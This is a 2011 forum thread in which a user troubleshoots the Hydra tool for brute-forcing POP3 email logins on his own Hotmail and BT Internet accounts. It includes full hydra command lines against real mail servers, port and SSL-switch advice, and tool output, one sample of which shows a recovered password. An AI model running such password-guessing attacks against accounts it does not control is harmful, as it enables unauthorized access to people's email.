SystemCrash86 Posted October 19, 2011 Share Posted October 19, 2011 There is alot of tutorials out there especially on youtube about how hydra can brute force router logins and telnet and ftp but i would like to know if its possible to brute force email because hydra supports pop3 and smtp etc .. so i put my actual password in a dictionary file hoping to see if it would work but it didnt work so i was wondering if it can actually be done and what i'm doing wrong. Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 21, 2011 Share Posted October 21, 2011 What exactly happens, when you run Hydra? Do you get any errors? Does it report what your password is? Quote Link to comment Share on other sites More sharing options...
digip Posted October 21, 2011 Share Posted October 21, 2011 (edited) How are you pointing hydra at your email server? You have the correct address of the server and ports accesible? Some mail servers use port 995 for secure pop3, vs 110 for normal pop3. Open telnet to the mail server and pop3 default port, see if you can reach it. If not, then something is not configured properly or it might not be open. Then try telnet to same server on port 995. If neither work, then you have the wrong address. Forgot to mention, some might need the entire email address, and not just the name, or vice versa, so if you put in the entire email address, try it with just the name. For command line use though, see here: http://wiki.bywire.org/Hydra#POP3_Password_Bruteforce (by the way, was able to bruteforce mine just now, works fine) Edited October 21, 2011 by digip Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 22, 2011 Share Posted October 22, 2011 It must be the command usage, you may not be entering right. Are you able to post the commends you are entering? Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 22, 2011 Author Share Posted October 22, 2011 When i use hydra i get: root@bt:~# hydra -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3 Hydra v7.0 ©2011 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-22 12:24:36 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] 16 tasks, 1 server, 2299 login tries (l:1/p:2299), ~143 tries per task [DATA] attacking service pop3 on port 995 [sTATUS] 16.00 tries/min, 16 tries in 00:01h, 2283 todo in 02:23h Error: Too many connect errors to target, disabling pop3://pop3.live.com 0 of 1 target successfuly completed, 0 valid passwords found Error: 1 target did not resolve or could not be connected Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-22 12:25:51 -l is my login username -P is the password list where i added my own password -i used pop3.live.com because i thought this was correct being as my account is hotmail.co.uk -s 995 is what i believe is one of the ports mentioned earlier -pop3 is the service type I have never used hydra properly before in all the time i have had backtrack 4 and now backtrack 5 but i would like to learn how to use it properly. The commands i used here are what i was able to piece together from forums and such but as you can see i must be doing something wrong, maybe it could be me misusing the commands. If this is the case could someone tell me the correct command to use Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 22, 2011 Author Share Posted October 22, 2011 How are you pointing hydra at your email server? You have the correct address of the server and ports accesible? Some mail servers use port 995 for secure pop3, vs 110 for normal pop3. Open telnet to the mail server and pop3 default port, see if you can reach it. If not, then something is not configured properly or it might not be open. Then try telnet to same server on port 995. If neither work, then you have the wrong address. Forgot to mention, some might need the entire email address, and not just the name, or vice versa, so if you put in the entire email address, try it with just the name. For command line use though, see here: http://wiki.bywire.org/Hydra#POP3_Password_Bruteforce (by the way, was able to bruteforce mine just now, works fine) What commands did you use in order to bruteforce it? i believe hydra works fine its just my command usage as mentioned Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 22, 2011 Share Posted October 22, 2011 The commands should be as the following: Command line: ./hydra -l muts -P pass.txt my.pop3.mail pop3 bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3 Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)] [110][pop3] login: muts password: mypassword Hydra finished. bash-2.05b# Quote Link to comment Share on other sites More sharing options...
digip Posted October 22, 2011 Share Posted October 22, 2011 I've noticed some issue with secure pop3, whcih runs on 995, try -S for ssl at the beginning of your command. More than likely, will not work against secure pop3, but give it a try. Structure it like you did before but with the ssl switch like so: hydra -S -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3 Thats a capital s at the beginning. Might help. I tried on my comcast and couldn't get it to work, but for my websites, which use normal pop3 (on 110), it worked fine. Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 22, 2011 Author Share Posted October 22, 2011 The commands should be as the following: Command line: ./hydra -l muts -P pass.txt my.pop3.mail pop3 bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3 Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)] [110][pop3] login: muts password: mypassword Hydra finished. bash-2.05b# what is the command for the normal hotmail.co.uk because thats the one i'm using and i usually use windows live mail so what would the command be for the my.pop3.mail pop3? Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 22, 2011 Author Share Posted October 22, 2011 (edited) I've noticed some issue with secure pop3, whcih runs on 995, try -S for ssl at the beginning of your command. More than likely, will not work against secure pop3, but give it a try. Structure it like you did before but with the ssl switch like so: hydra -S -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3 Thats a capital s at the beginning. Might help. I tried on my comcast and couldn't get it to work, but for my websites, which use normal pop3 (on 110), it worked fine. I tried that with the command: hydra -S -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3 and the results where as follows: Process 20298: Can not connect [timeout], process exiting [ERROR] Child with pid 20366 terminating, can not connect [ERROR] Child with pid 20367 terminating, can not connect Process 20306: Can not connect [timeout], process exiting [ERROR] Child with pid 20373 terminating, can not connect Process 20337: Can not connect [timeout], process exiting Process 20338: Can not connect [timeout], process exiting Process 20339: Can not connect [timeout], process exiting [ERROR] Child with pid 20390 terminating, can not connect [ERROR] Child with pid 20391 terminating, can not connect [ERROR] Child with pid 20395 terminating, can not connect [ERROR] Child with pid 20396 terminating, can not connect [ERROR] Child with pid 20397 terminating, can not connect [ERROR] Child with pid 20400 terminating, can not connect [ERROR] Child with pid 20403 terminating, can not connect [ERROR] Child with pid 20404 terminating, can not connect [ERROR] Child with pid 20407 terminating, can not connect [ERROR] Child with pid 20408 terminating, can not connect [ERROR] Child with pid 20411 terminating, can not connect [ERROR] Child with pid 20414 terminating, can not connect [ERROR] Child with pid 20415 terminating, can not connect [ERROR] Child with pid 20418 terminating, can not connect [ERROR] Child with pid 20420 terminating, can not connect Error: Too many connect errors to target, disabling pop3://pop3.live.com 0 of 1 target successfuly completed, 0 valid passwords found [iNFO] Writing restore file because 1 server scan could not be completed Error: 1 target was disabled because of too many errors Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-22 16:11:38 Did i do something wrong? Also i tried this on my other email address and i didnt get any errors but it failed to find my password even though i put it in my password list for it to be found root@bt:~# hydra -l myemailaddress@btinternet.com -P /pentest/passwords/wordlists/password.lst mail.btinternet.com -s 110 pop3 Hydra v7.0 ©2011 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-22 17:22:23 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] 16 tasks, 1 server, 2300 login tries (l:1/p:2300), ~143 tries per task [DATA] attacking service pop3 on port 110 [sTATUS] 400.00 tries/min, 400 tries in 00:01h, 1900 todo in 00:05h [sTATUS] 399.67 tries/min, 1199 tries in 00:03h, 1101 todo in 00:03h [sTATUS] attack finished for mail.btinternet.com (waiting for children to finish) 1 of 1 target successfuly completed, 0 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-22 17:28:19 Edited October 22, 2011 by SystemCrash86 Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 30, 2011 Share Posted October 30, 2011 Just wondering are you able to log into your Hotmail account as normal, when you are not using Hydra to brute force it? Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted November 25, 2011 Author Share Posted November 25, 2011 Just wondering are you able to log into your Hotmail account as normal, when you are not using Hydra to brute force it? yes everything works normal, i just wanted to test hydra to see if it works because i have never used it before. As you can see from the output earlier i must have done something wrong but not sure what it was. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.